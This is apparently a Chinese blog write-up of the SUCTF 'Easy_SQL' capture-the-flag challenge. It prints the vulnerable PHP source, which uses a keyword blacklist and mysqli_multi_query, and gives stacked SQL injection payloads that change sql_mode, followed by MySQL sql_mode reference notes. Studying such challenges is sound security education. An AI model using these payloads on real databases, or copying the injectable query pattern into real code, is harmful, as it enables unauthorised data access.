<!DOCTYPE html>
<html>
  <head><meta name="generator" content="Hexo 3.9.0">
<meta name="google-site-verification" content="fQ_tfBgNjE9NQcpKnGAkWapHoKuimF5lVuNuqpPXar0">
    <meta charset="utf-8">
    
    <title>Suctf-Easy_SQL-复现总结 | Xiao Leung&#39;s Blog</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    
    
      <link rel="icon" href="/favicon.png">
    

    <link rel="stylesheet" href="/css/style.css">

    <link rel="stylesheet" href="/js/google-code-prettify/tomorrow-night-eighties.min.css">

  </head>

  <body>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body></html>
<header>

	<a id="logo" href="/" title="Xiao Leung&#39;s Blog">
	<img src="/favicon.png" alt="Xiao Leung&#39;s Blog"></a>
	
	
		<!--搜索栏-->
		<i class="js-toggle-search iconfont icon-search"></i>


<form class="js-search search-form search-form--modal" method="get" action="http://gushi.li" role="search">
	<div class="search-form__inner">
		<div>
			<i class="iconfont icon-search"></i>
			<input class="text-input" placeholder="Enter Key..." type="search">
		</div>
	</div>
</form>
	

	
		<!--侧边导航栏-->
		<a id="nav-toggle" href="#"><span></span></a>

<nav>
	<div class="menu-top-container">
		<ul id="menu-top" class="menu">
			
				
				<li class="current-menu-item">
					<a href="https://www.plasf.cn/2019/08/01/HelloWorld/" target="_blank">AboutMe</a>
				</li>
			
				
				<li class="current-menu-item">
					<a href="https://www.plasf.cn/HXCTF/" target="_blank">HXCTF</a>
				</li>
			
		</ul>
	</div>
</nav>
	

</header>

<div class="m-header ">
	<section id="hero1" class="hero">
		<div class="inner">
		</div>
	</section>
	
		<figure class="top-image" data-enable=true></figure>
	
</div>

<!--文章列表-->
<div class="wrapper">
  
    <!--文章-->
<article>
	
  
    <h1 class="post-title" itemprop="name">
      Suctf-Easy_SQL-复现总结
    </h1>
  

	<div class='post-body mb'>
		<p>这道题考了mysql的SQL Mode如果没有运维事故把源码泄露了还自己感觉脑洞也有点大。但是有师傅fuzz出来了一个非预期解。</p>
<h1 id="预期解"><a href="#预期解" class="headerlink" title="预期解"></a>预期解</h1><pre><code class="php">&lt;?php
    session_start();

    include_once &quot;config.php&quot;;

    $post = array();
    $get = array();
    global $MysqlLink;

    //GetPara();
    $MysqlLink = mysqli_connect(&quot;localhost&quot;,$datauser,$datapass);
    if(!$MysqlLink){
        die(&quot;Mysql Connect Error!&quot;);
    }
    $selectDB = mysqli_select_db($MysqlLink,$dataName);
    if(!$selectDB){
        die(&quot;Choose Database Error!&quot;);
    }

    foreach ($_POST as $k=&gt;$v){
        if(!empty($v)&amp;&amp;is_string($v)){
            $post[$k] = trim(addslashes($v));
        }
    }
    foreach ($_GET as $k=&gt;$v){
        }
    }
    //die();
    ?&gt;

&lt;html&gt;
&lt;head&gt;
&lt;/head&gt;

&lt;body&gt;

&lt;a&gt; Give me your flag, I will tell you if the flag is right. &lt;/ a&gt;
&lt;form action=&quot;&quot; method=&quot;post&quot;&gt;
&lt;input type=&quot;text&quot; name=&quot;query&quot;&gt;
&lt;input type=&quot;submit&quot;&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;

&lt;?php

    if(isset($post[&#39;query&#39;])){
        $BlackList = &quot;prepare|flag|unhex|xml|drop|create|insert|like|regexp|outfile|readfile|where|from|union|update|delete|if|sleep|extractvalue|updatexml|or|and|&amp;|\&quot;&quot;;
        //var_dump(preg_match(&quot;/{$BlackList}/is&quot;,$post[&#39;query&#39;]));
        if(preg_match(&quot;/{$BlackList}/is&quot;,$post[&#39;query&#39;])){
            //echo $post[&#39;query&#39;];
            die(&quot;Nonono.&quot;);
        }
        if(strlen($post[&#39;query&#39;])&gt;40){
            die(&quot;Too long.&quot;);
        }
        $sql = &quot;select &quot;.$post[&#39;query&#39;].&quot;||flag from Flag&quot;;
        mysqli_multi_query($MysqlLink,$sql);
        do{
            if($res = mysqli_store_result($MysqlLink)){
                while($row = mysqli_fetch_row($res)){
                    print_r($row);
                }
            }
        }while(@mysqli_next_result($MysqlLink));

    }

    ?&gt;</code></pre>
<p>源码泄露如上。可以直接看到执行语句：<code>select &quot;.$post[&#39;query&#39;].&quot;||flag from Flag</code>有一个管道符但是在MYSQL中是不能直接使用管道符的会将<code>||</code>视为运算符。需要设置</p>
<p>sql_mode为<code>PIPES_AS_CONCA</code>.这里也是一个堆叠注入。payload如下：</p>
<pre><code class="mysql">1;show databases; #查库
1;show tables;#查表
最终payload:
1;set sql_mode=PIPES_AS_CONCA;select 1</code></pre>
<h1 id="非预期解"><a href="#非预期解" class="headerlink" title="非预期解"></a>非预期解</h1><pre><code>*,1</code></pre><p>相关知识：</p>
<p><strong>1. SQL语法支持类</strong></p>
<ul>
<li><p><strong>ONLY_FULL_GROUP_BY</strong>   对于GROUP BY聚合操作，如果在SELECT中的列、HAVING或者ORDER BY子句的列，没有在GROUP BY中出现，那么这个SQL是不合法的。是可以理解的，因为不在 group by 的列查出来展示会有矛盾。<br> 在5.7中默认启用，所以在实施5.6升级到5.7的过程需要注意：</p>
<pre><code> Expression #1 of SELECT list is not in GROUP BY
clause and contains nonaggregated column
&#39;1066export.ebay_order_items.TransactionID&#39; which
is not functionally dependent on columns in GROUP BY
clause; this is incompatible with sql_mode=only_full_group_by</code></pre></li>
<li><p><strong>ANSI_QUOTES</strong>  启用 ANSI_QUOTES 后，不能用双引号来引用字符串，因为它被解释为识别符，作用与 <code>一样。设置它以后，</code>update t set f1=”” …`，会报 Unknown column ‘’ in ‘field list 这样的语法错误。</p>
</li>
<li><p><strong>PIPES_AS_CONCAT</strong>   将 <code>||</code> 视为字符串的连接操作符而非 或 运算符，这和Oracle数据库是一样的，也和字符串的拼接函数 CONCAT() 相类似。</p>
</li>
<li><p><strong>NO_TABLE_OPTIONS</strong>   使用 <code>SHOW CREATE TABLE</code> 时不会输出MySQL特有的语法部分，如 <code>ENGINE</code> ，这个在使用 mysqldump 跨DB种类迁移的时候需要考虑。</p>
</li>
<li><p><strong>NO_AUTO_CREATE_USER</strong>   字面意思不自动创建用户。在给MySQL用户授权时，我们习惯使用 <code>GRANT ... ON ... TO dbuser</code> 顺道一起创建用户。设置该选项后就与oracle操作类似，授权之前必须先建立用户。5.7.7开始也默认了。</p>
</li>
</ul>
<p><strong>2. 数据检查类</strong></p>
<ul>
<li><p><strong>NO_ZERO_DATE</strong>   认为日期 ‘0000-00-00’ 非法，与是否设置后面的严格模式有关。</p>
<ol>
<li>如果设置了严格模式，则 NO_ZERO_DATE 自然满足。但如果是 INSERT IGNORE 或 UPDATE IGNORE，’0000-00-00’依然允许且只显示warning</li>
<li>如果在非严格模式下，设置了<code>NO_ZERO_DATE</code>，效果与上面一样，’0000-00-00’允许但显示warning；如果没有设置<code>NO_ZERO_DATE</code>，no warning，当做完全合法的值。</li>
<li><code>NO_ZERO_IN_DATE</code>情况与上面类似，不同的是控制日期和天，是否可为 0 ，即 <code>2010-01-00</code> 是否合法。</li>
</ol>
</li>
<li><p><strong>NO_ENGINE_SUBSTITUTION</strong>   使用 <code>ALTER TABLE</code>或<code>CREATE TABLE</code> 指定 ENGINE 时， 需要的存储引擎被禁用或未编译，该如何处理。启用<code>NO_ENGINE_SUBSTITUTION</code>时，那么直接抛出错误；不设置此值时，CREATE用默认的存储引擎替代，ATLER不进行更改，并抛出一个 warning .</p>
</li>
<li><p><strong>STRICT_TRANS_TABLES</strong> 设置它，表示启用严格模式。<br> 注意 <code>STRICT_TRANS_TABLES</code> 不是几种策略的组合，单独指 <code>INSERT</code>、<code>UPDATE</code>出现少值或无效值该如何处理：</p>
<ol>
<li><p>前面提到的把 ‘’ 传给int，严格模式下非法，若启用非严格模式则变成0，产生一个warning</p>
</li>
<li><p>Out Of Range，变成插入最大边界值</p>
</li>
<li><p>A value is missing when a new row to be inserted does not contain  a value for a non-NULL column that has no explicit DEFAULT clause in  its definition</p>
</li>
</ol>
</li>
</ul>
<p>手册：<a href="https://mariadb.com/kb/en/library/sql-mode/" target="_blank" rel="noopener">https://mariadb.com/kb/en/library/sql-mode/</a></p>

	</div>
	<div class="meta split">
		
			<span>本文总阅读量 <span id="busuanzi_value_page_pv"></span> 次</span>
		
		<time class="post-date" datetime="2019-09-01T15:08:09.000Z" itemprop="datePublished">2019-09-01</time>
	</div>
</article>

<!--评论-->

	
<div class="ds-thread" data-thread-key="2019-9-1-Suctf-Easy_SQL-复现总结" data-title="Suctf-Easy_SQL-复现总结" data-url="http://www.plasf.cn/2019/09/01/2019-9-1-Suctf-Easy_SQL-复现总结/"></div>
<script type="text/javascript">

var duoshuoQuery = {short_name:"yumemor"};
	(function() {
		var ds = document.createElement('script');
		ds.type = 'text/javascript';ds.async = true;
		ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
		ds.charset = 'UTF-8';
		(document.getElementsByTagName('head')[0]
		 || document.getElementsByTagName('body')[0]).appendChild(ds);
	})();
</script>


  
</div>


  <svg id="bigTriangleColor" width="100%" height="40" viewBox="0 0 100 102" preserveAspectRatio="none">
    <path d="M0 0 L50 100 L100 0 Z"></path>
  </svg>

  


  <div class="wrapper"></div>





<div class="fat-footer">
	<div class="wrapper">
		<div class="layout layout--center">
			<div class="layout__item palm-mb">
				<div class="media">
					<img class="headimg" src='/assets/blogImg/litten.png' alt='XiaoLeung'>
					<div class="media__body">
						<h4>兵至如归-Xiaoleung&#39;s Blog</h4>
						<p class='site-description'>Don&#39;t forget why we started</p>
					</div>
				</div>
				<div class="author-contact">
					<ul>
						
							
							<li>
				        		<a href="https://github.com/sharpleung" target="_blank">
				        			
				        				<i class="iconfont icon-github"></i>
				        			
				        		</a>
				        	</li>
						
					</ul>
				</div>
			</div>
		</div>
	</div>
</div>

<footer class="footer" role="contentinfo">
	<div class="wrapper wrapper--wide split split--responsive">
<a href="http://beian.miit.gov.cn/">粤ICP备18132442号-1</a><br>
<a target="_blank" href="http://www.beian.gov.cn/portal/registerSystemInfo?recordcode=44011202000643" style="display:inline-block;text-decoration:none;height:20px;line-height:20px;"><img src="http://beian.gov.cn/img/ghs.png" style="float:left;"/><p style="float:left;height:20px;line-height:20px;margin: 0px 0px 0px 5px; color:#939393;">粤公网安备 44011202000643号</p></a><br>

		
			<span>本站总访问量 <span id="busuanzi_value_site_pv"></span> 次, 访客数 <span id="busuanzi_value_site_uv"></span> 人次</span>
		
		<span>Theme by <a href="http://github.com/justpsvm">justpsvm</a>. Powered by <a href="http://hexo.io">Hexo</a></span>
	</div>
</footer>

	<!-－这里导入了 lib.js 里面涵盖了 jQuery 等框架 所以注释掉-->
	<!--<script src="http://lib.sinaapp.com/js/jquery/2.0/jquery.min.js"></script>-->
	<script src="/js/lib.js"></script>
	<script src="/js/google-code-prettify/prettify.js"></script>
	<script src="/js/module.js"></script>
	<script src="/js/script.js"></script>
	
		<script async src="http://dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script>
	
	<script type='text/javascript'>
		//代码高亮
		$(document).ready(function(){
	 		$('pre').addClass('prettyprint linenums').attr('style', 'overflow:auto;');
   			prettyPrint();
		});
	</script>
	<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script><script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
</html>

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
 <script type="text/javascript"> /* 鼠标点击特效 - 7Core.CN */ var a_idx = 0;jQuery(document).ready(function($) {$("body").click(function(e) {var a = new Array("富强", "民主", "文明", "和谐", "自由", "平等", "公正" ,"法治", "爱国", "敬业", "诚信", "友善");var $i = $("<span/>").text(a[a_idx]); a_idx = (a_idx + 1) % a.length;var x = e.pageX,y = e.pageY;$i.css({"z-index": 100000000,"top": y - 20,"left": x,"position": "absolute","font-weight": "bold","color": "#ff6651"});$("body").append($i);$i.animate({"top": y - 180,"opacity": 0},1500,function() {$i.remove();});});}); </script>

